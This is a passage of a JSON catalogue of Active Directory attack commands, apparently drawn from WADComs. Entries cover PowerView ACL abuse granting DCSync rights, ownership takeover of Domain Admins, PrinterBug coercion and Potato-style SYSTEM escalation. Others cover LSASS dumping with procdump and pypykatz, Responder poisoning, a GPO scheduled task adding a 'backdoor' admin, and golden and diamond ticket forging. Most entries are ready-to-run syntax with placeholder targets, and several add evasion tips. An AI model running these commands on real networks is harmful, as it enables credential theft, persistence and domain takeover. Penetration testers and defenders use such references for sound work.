tool","aliases":[]},{"id":"wadcoms:PowerView-AddDomainObjectAcl-DCSync","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-AddDomainObjectAcl-DCSync","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Credential Access","Privilege Escalation"],"nativeCategory":["Persistence","Credential Access","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\n# Grant john DCSync replication rights on the domain object\nAdd-DomainObjectAcl -TargetIdentity 'DC=test,DC=local' -PrincipalIdentity john -Rights DCSync -Verbose","description":"Add-DomainObjectAcl grants an ACE on a target object to a principal you control. Targeting the domain head with -Rights DCSync adds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, letting your account replicate secrets (a DCSync attack) without being a Domain Admin. This requires that your current context can already write the domain object's DACL (e.g. WriteDacl on the domain), and it is a durable backdoor that should be cleaned up with Remove-DomainObjectAcl.\n\nCommand Reference:\n\n\tPrincipal granted rights: john\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-ASREPRoastable","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-ASREPRoastable","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\nGet-DomainUser -PreauthNotRequired -Properties samaccountname,useraccountcontrol -Verbose","description":"Get-DomainUser -PreauthNotRequired finds accounts with the DONT_REQ_PREAUTH flag (userAccountControl bit 0x400000), which are AS-REP roastable because a DC will return an encrypted AS-REP without prior authentication. Use it to identify targets whose AS-REP hash you can then crack offline. This is an LDAP read only; the actual roast is performed with a separate tool such as Rubeus or GetNPUsers.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP","Kerberos"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-DomainTrust","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-DomainTrust","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\n# Trusts of the current domain\nGet-DomainTrust\n# Forest / inter-forest trusts\nGet-ForestTrust\n# Recursively map every reachable trust\nGet-DomainTrustMapping","description":"Get-DomainTrust enumerates the trust relationships of the current (or a specified) domain, while Get-ForestTrust returns forest-level (inter-forest) trusts. Reading trust direction, transitivity, and SID-filtering state is the first step in planning cross-domain and cross-forest attacks such as foreign group membership abuse or trust-key based ticket forging. Get-DomainTrustMapping walks reachable domains recursively to build the full trust graph.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-FindLocalAdminAccess","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-FindLocalAdminAccess","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Lateral Movement"],"nativeCategory":["Discovery","Lateral Movement"],"command":"Import-Module .\\PowerView.ps1\nFind-LocalAdminAccess -Verbose | Out-File output.txt","description":"Find-LocalAdminAccess queries the domain for all computers and then, using the OpenServiceControlManager check, tests each one to see whether the current user context has local administrator access. It is the fastest way to discover where your foothold account can already move laterally without cracking anything. The SCM probes generate authentication traffic to many hosts, so it is not stealthy on a monitored network.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt","mitre":[],"requires":["PowerShell"],"services":["SMB"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-GetDomainObjectAcl","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-GetDomainObjectAcl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Privilege Escalation"],"nativeCategory":["Discovery","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\nGet-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |\n ? { $_.ActiveDirectoryRights -match 'WriteDacl|WriteOwner|GenericAll|GenericWrite' }","description":"Get-DomainObjectAcl returns the raw DACL for a single object so you can confirm exactly which principals hold which rights over a specific user, group, computer, or the domain head. Pair -Identity with -ResolveGUIDs to expand extended rights such as DS-Replication-Get-Changes (DCSync) or User-Force-Change-Password. This is the targeted follow-up to Find-InterestingDomainAcl when you already know the object you want to attack.\n\nCommand Reference:\n\n\tTarget object: Domain Admins\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-GPOLocalGroup","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-GPOLocalGroup","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\n# All GPOs in the domain\nGet-DomainGPO -Properties displayname,name\n# GPOs that modify local group membership\nGet-DomainGPOLocalGroup\n# Where does 'john' become a local Administrator via GPO?\nGet-DomainGPOUserLocalGroupMapping -Identity john -LocalGroup Administrators","description":"Get-DomainGPO enumerates every Group Policy Object in the domain, and Get-DomainGPOLocalGroup parses GPOs that use Restricted Groups or Group Policy Preferences to set local group membership (for example local Administrators). Get-DomainGPOUserLocalGroupMapping then resolves which machines a given user or group ends up as local admin on through those GPOs. Together they map the GPO-to-local-admin relationships needed for lateral movement and for finding GPOs worth abusing.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-InterestingDomainAcl","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-InterestingDomainAcl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Privilege Escalation"],"nativeCategory":["Discovery","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\nFind-InterestingDomainAcl -ResolveGUIDs |\n ? { $_.IdentityReferenceName -eq 'john' } |\n select ObjectDN, ActiveDirectoryRights, IdentityReferenceName","description":"Find-InterestingDomainAcl surfaces ACEs across the domain that grant modification rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, ResetPassword, etc.) to non-built-in principals, which are the ACL-based privilege escalation paths. The -ResolveGUIDs switch translates extended-right and property-set object GUIDs into human-readable names so DCSync and ForceChangePassword rights are legible. Filtering the output to your controlled principals quickly reveals abusable edges.\n\nCommand Reference:\n\n\tUsername: john","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://www.thehacker.recipes/ad/movement/dacl/","https://wald0.com/?p=112"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-InvokeUserHunter","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-InvokeUserHunter","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Lateral Movement"],"nativeCategory":["Discovery","Lateral Movement"],"command":"Import-Module .\\PowerView.ps1\n# Hunt for any Domain Admin session, flag where we already have admin\nInvoke-UserHunter -GroupName 'Domain Admins' -CheckAccess\n# Quieter variant: only query likely session hosts\nInvoke-UserHunter -GroupName 'Domain Admins' -Stealth","description":"Invoke-UserHunter finds machines where a target user (or members of a target group such as Domain Admins) is logged in or has an active session, by combining Get-NetSession, Get-NetLoggedon, and Get-NetComputer across the domain. Adding -CheckAccess also reports whether you already have local admin on the hosts where the target is present, marking immediate credential-theft opportunities. Use -Stealth to only query high-value session hosts (DCs, file servers) and reduce noise.\n\nCommand Reference:\n\n\tTarget group: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["SMB"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-Kerberoastable-SPN","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-Kerberoastable-SPN","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Import PowerView into the current session first\nImport-Module .\\PowerView.ps1\n# List every account with an SPN (kerberoastable)\nGet-DomainUser -SPN -Properties samaccountname,serviceprincipalname | Out-File output.txt","description":"PowerView's Get-DomainUser -SPN enumerates domain user accounts that have a servicePrincipalName set, which are the candidates for Kerberoasting. Run it from an existing domain-joined foothold shell to build a target list before requesting service tickets. It only queries LDAP and does not request any TGS, so it is quiet on its own; the noisy step is the later roast.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt","mitre":[],"requires":["PowerShell"],"services":["LDAP","Kerberos"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PowerView-SetDomainObjectOwner","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-SetDomainObjectOwner","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Import-Module .\\PowerView.ps1\n# Take ownership of the target, then we can rewrite its DACL\nSet-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity john -Verbose\nAdd-DomainObjectAcl -TargetIdentity 'Domain Admins' -PrincipalIdentity john -Rights All","description":"Set-DomainObjectOwner changes the owner of an AD object to a principal you control. When you hold WriteOwner over a target, taking ownership lets you then write its DACL (via Add-DomainObjectAcl) and grant yourself full control, chaining a limited ACE into complete object takeover. This is the classic first step of a WriteOwner-to-GenericAll escalation against a privileged group or user.\n\nCommand Reference:\n\n\tNew owner: john\n\n\tTarget object: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:pre2k-Auth","toolId":"wadcoms:pre2k","toolName":"pre2k","name":"pre2k Authenticated Enumeration","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"pre2k auth -d test.local -u john -p password123 -dc-ip 10.10.10.1 -save","description":"In auth mode pre2k uses valid domain credentials to query LDAP for computer objects whose userAccountControl still flags them as pre-created (pwdLastSet == 0 / never logged on) and sprays the lowercase-name password against each. This finds pre-Windows 2000 accounts that are still active and abusable directly from an existing foothold, avoiding blind guessing. Add -targeted to focus on accounts with no lastlogontimestamp and -save to grab a TGT for each hit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:pre2k-Unauth","toolId":"wadcoms:pre2k","toolName":"pre2k","name":"pre2k Unauthenticated Spray","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Discovery"],"nativeCategory":["Credential Access","Discovery"],"command":"pre2k unauth -d test.local -dc-ip 10.10.10.1 -inputfile output.txt -save","description":"pre2k (Garrett Foster) abuses pre-Windows 2000 pre-created computer accounts, whose password is the lowercase of the sAMAccountName without the trailing dollar sign (e.g. account WORKSTATION01$ has password 'workstation01'). In unauth mode it takes a list of candidate machine names (recovered from a null LDAP/RPC bind or enumeration) and Kerberos pre-auth sprays them, requiring no domain credentials. Use -save to request and store a TGT (.ccache) for any account that authenticates, giving an initial foothold.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDC IP: 10.10.10.1\n\n\tInput file: output.txt","mitre":[],"requires":["No credentials"],"services":["Kerberos","LDAP"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PrinterBug-printerbug","toolId":"wadcoms:PrinterBug","toolName":"PrinterBug","name":"PrinterBug-printerbug","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 printerbug.py test.local/john:password123@10.10.10.1 10.10.10.2","description":"printerbug.py (shipped with dirkjanm's krbrelayx toolkit) abuses the MS-RPRN Print System Remote Protocol (the SpoolSample / PrinterBug technique) by calling RpcRemoteFindFirstPrinterChangeNotificationEx on the target's spooler service, forcing the target machine account to authenticate back to an attacker-controlled host over SMB or HTTP. The captured machine-account authentication is then relayed with ntlmrelayx or krbrelayx (e.g. for RBCD or ADCS abuse). The target is given as a domain/user:password@target connection string followed by the attacker host. Requires a valid domain account and a running Print Spooler on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/dirkjanm/krbrelayx","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:PrintSpoofer-SeImpersonate","toolId":"wadcoms:PrintSpoofer","toolName":"PrintSpoofer","name":"PrintSpoofer-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Spawn an interactive SYSTEM shell in the current console\nPrintSpoofer64.exe -i -c cmd\n\n# Or run a single payload as SYSTEM (non-interactive)\nPrintSpoofer64.exe -c \"C:\\Windows\\System32\\cmd.exe /c whoami > C:\\output.txt\"","description":"PrintSpoofer abuses SeImpersonatePrivilege held by service accounts (IIS AppPool, MSSQL, etc.) to escalate to SYSTEM. It coerces the local Print Spooler service to authenticate to an attacker-controlled named pipe (\\\\pipe\\\\spoolss) via MS-RPRN, captures the SYSTEM token with ImpersonateNamedPipeClient, and uses CreateProcessAsUser/WithTokenW to spawn a process. Use it when you land as a low-privileged service account whose token shows SeImpersonatePrivilege enabled; it works on Windows 10 / Server 2016-2019 where JuicyPotato's DCOM path was patched. Requires the Print Spooler service running and the SeImpersonate (or SeAssignPrimaryToken) privilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege","mitre":[],"requires":["Shell"],"services":["RPC"],"references":["https://github.com/itm4n/PrintSpoofer","https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Procdump-LSASS","toolId":"wadcoms:Procdump","toolName":"Procdump","name":"Procdump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass.dmp","description":"Procdump is a signed Microsoft Sysinternals utility, so it often survives application allowlisting and looks benign on disk while still producing a full LSASS memory dump. The -ma flag writes a complete dump (all memory) of lsass.exe and -accepteula suppresses the license prompt for non-interactive use. It needs administrator rights with SeDebugPrivilege; copy the .dmp off-host and extract credentials with pypykatz or Mimikatz sekurlsa::minidump.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:pyGPOAbuse-ScheduledTask","toolId":"wadcoms:pyGPOAbuse","toolName":"pyGPOAbuse","name":"pyGPOAbuse-ScheduledTask","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# With a password: add a local admin user via an immediate scheduled task\npython3 pygpoabuse.py test.local/john:password123 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" \\\n -dc-ip 10.10.10.1 \\\n -taskname \"SecurityUpdate\" \\\n -command 'net user backdoor P@ssw0rd /add && net localgroup Administrators backdoor /add'\n\n# Pass-the-hash variant\npython3 pygpoabuse.py test.local/john -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" -dc-ip 10.10.10.1","description":"pyGPOAbuse is a partial Linux/Python implementation of SharpGPOAbuse that abuses write access to a GPO by adding an immediate scheduled task to its Machine (or User) preferences, executing an arbitrary command as SYSTEM on hosts in scope at the next policy refresh. You authenticate with a password or NT hash and target the GPO by its GUID (-gpo-id), which you can obtain from PowerView's Get-DomainGPO or ldapsearch. It is ideal when operating from a Linux box with no Windows tooling; use --cleanup afterwards to remove the planted task.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tDC IP: 10.10.10.1","mitre":["T1484.001"],"requires":["Username","Password","NTLM hash"],"services":["LDAP","SMB"],"references":["https://github.com/Hackndo/pyGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Pypykatz-Minidump","toolId":"wadcoms:Pypykatz","toolName":"Pypykatz","name":"Pypykatz-Minidump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"pypykatz lsa minidump lsass.dmp -o output.txt","description":"Pypykatz is a pure-Python reimplementation of Mimikatz's sekurlsa module that parses an LSASS minidump entirely offline, so credentials can be extracted on the operator's Linux box without running Mimikatz on the target. Feed it any dump produced by nanodump, comsvcs.dll MiniDump, or procdump to recover NT hashes, Kerberos keys, and cached plaintexts. This keeps the noisy parsing off the victim host and out of reach of host EDR.\n\nCommand Reference:\n\n\tInput dump: lsass.dmp\n\n\tOutput file: output.txt","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/skelsec/pypykatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Responder-Poisoning","toolId":"wadcoms:Responder","toolName":"Responder","name":"Responder-Poisoning","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection","Execution"],"nativeCategory":["Credential Access","Collection","Exploitation"],"command":"# Actively poison LLMNR/NBT-NS/mDNS and serve rogue WPAD to capture NetNTLM hashes\nsudo responder -I eth0 -wv","description":"Responder is an LLMNR, NBT-NS, and mDNS poisoner. Run without the analyze flag, it actively answers name-resolution broadcasts (LLMNR, NBT-NS, mDNS) with the attacker's IP, causing victims to connect to Responder's rogue SMB/HTTP/etc. servers and disclose NTLMv1/NTLMv2 challenge-response hashes, which are captured to logs for offline cracking. The -w flag starts the rogue WPAD proxy to poison web-proxy autodiscovery, and -d answers DHCP requests. Captured hashes can be cracked with hashcat or, instead of cracking, forwarded live to ntlmrelayx.py (disable Responder's SMB and HTTP servers in Responder.conf when relaying). This is a noisy, active on-network attack.\n\nCommand Reference:\n\n\tInterface: eth0\n\n\tCaptured hashes log: hashes.txt","mitre":["T1557.001"],"requires":["No credentials"],"services":["NTLM","SMB"],"references":["https://github.com/lgandx/Responder","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing","https://attack.mitre.org/techniques/T1557/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:RoguePotato-SeImpersonate","toolId":"wadcoms:RoguePotato","toolName":"RoguePotato","name":"RoguePotato-SeImpersonate","source":"DAEMON","platform":["Windows","Linux","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# On the attacker (Linux): redirect inbound 135 back to the RoguePotato listener on the target\nsocat tcp-listen:135,reuseaddr,fork tcp:10.10.10.1:9999\n\n# On the target (Windows): -r remote OXID resolver, -e command, -l listener port\nRoguePotato.exe -r 10.10.10.2 -e \"C:\\Windows\\System32\\cmd.exe /c whoami\" -l 9999","description":"RoguePotato bypasses the JuicyPotato mitigation by redirecting the DCOM/RPC OXID resolution to a remote resolver the attacker controls on port 135, which forces a SYSTEM authentication that RoguePotato impersonates. Because outbound 135 to the internet is usually blocked and the target queries the resolver on 135, run a socat redirector on the attacker host that forwards 135 to the RoguePotato listener port (-l) on the target. Works on Windows 10 / Server 2016-2019. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tAttacker/Listener IP: 10.10.10.2\n\n\tTarget IP: 10.10.10.1\n\n\tOXID resolver / listen port: 9999","mitre":[],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/antonioCoco/RoguePotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-Describe","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Describe","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"# Parse and describe a ticket offline\nRubeus.exe describe /ticket:ticket.kirbi","description":"Rubeus describe parses a ticket (TGT or service ticket) and prints its metadata: user, realm, service name, encryption type, flags, start/end/renew-till times and the session key. It does not touch the network, making it a safe way to inspect captured or forged tickets before use. Supplying a service/krbtgt key allows it to also decrypt and display the embedded PAC.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":[],"requires":["Kerberos ticket"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-DiamondTicket","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-DiamondTicket","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Defense Evasion","Execution"],"nativeCategory":["Persistence","Defense Evasion","Exploitation"],"command":"# Forge a diamond TGT: request a real TGT as 'john', then re-sign the PAC as administrator (RID 500).\n# /krbkey is the krbtgt AES256 key.\nRubeus.exe diamond /creduser:john /credpassword:password123 /krbkey:5db474e563f34e4bb62e04eecd4a6f92 /ticketuser:administrator /ticketuserid:500 /groups:512 /nowrap","description":"Rubeus diamond forges a diamond ticket by requesting a real TGT for a valid account, decrypting it with the krbtgt key, modifying the embedded PAC (user, RID, groups, extra SIDs) and re-encrypting it. Unlike a golden ticket it is derived from a legitimate KDC-issued TGT, so its metadata is internally consistent and far harder to distinguish from genuine tickets. Requires valid credentials for the request plus the krbtgt AES/NT key to re-sign the PAC.\n\nCommand Reference:\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAES256 krbtgt key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local","mitre":[],"requires":["AES key","Username","Password"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket","https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-Dump","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Dump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Dump all TGTs from LSA (elevated dumps every session)\nRubeus.exe dump /service:krbtgt /nowrap","description":"Rubeus dump extracts Kerberos tickets from LSA memory. When elevated it dumps tickets for every logon session on the host; unelevated it returns only the current user's tickets. Filters let you target a specific service (e.g. krbtgt for TGTs) or LUID, and /nowrap keeps the base64 on a single line for easy copy-out and reuse via ptt.\n\nCommand Reference:\n\n\tService filter: krbtgt","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1558/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-GoldenTicket-AES","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-GoldenTicket-AES","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Execution"],"nativeCategory":["Persistence","Exploitation"],"command":"# Forge an AES256 golden ticket for the built-in administrator (RID 500)\nRubeus.exe golden /aes256:5db474e563f34e4bb62e04eecd4a6f92 /user:administrator /id:500 /domain:test.local /sid:S-1-5-21-1339291983-1349129144-367733775 /nowrap","description":"Rubeus golden forges a TGT signed with the domain krbtgt key, granting arbitrary identity and group membership across the domain until the krbtgt password is rotated twice. Supplying the krbtgt AES256 key with /aes256 produces an AES-encrypted ticket, avoiding the RC4 golden tickets that modern detections flag. Requires the krbtgt key, the domain SID, and typically privileged access to have obtained the key via DCSync.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tUsername: administrator\n\n\tDomain: test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":["T1558.001"],"requires":["AES key"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-Harvest","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Harvest","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection","Persistence"],"nativeCategory":["Credential Access","Collection","Persistence"],"command":"# Harvest TGTs every 30s and auto-renew them up to their renew-till limit\nRubeus.exe harvest /interval:30 /nowrap","description":"Rubeus harvest monitors for new TGTs and automatically renews them before they expire, keeping a working cache of live tickets that can be extracted and reused. It combines the monitor behavior with auto-renewal, which is valuable during long engagements to avoid losing captured tickets to the default 10-hour lifetime. Elevation is required to harvest tickets for all logon sessions.\n\nCommand Reference:\n\n\tMonitor interval: 30 seconds","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://attack.mitre.org/techniques/T1558/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Rubeus-Monitor","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Monitor","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"# Poll every 5 seconds for newly captured TGTs, filtered to one user\nRubeus.exe monitor /interval:5 /filteruser:john 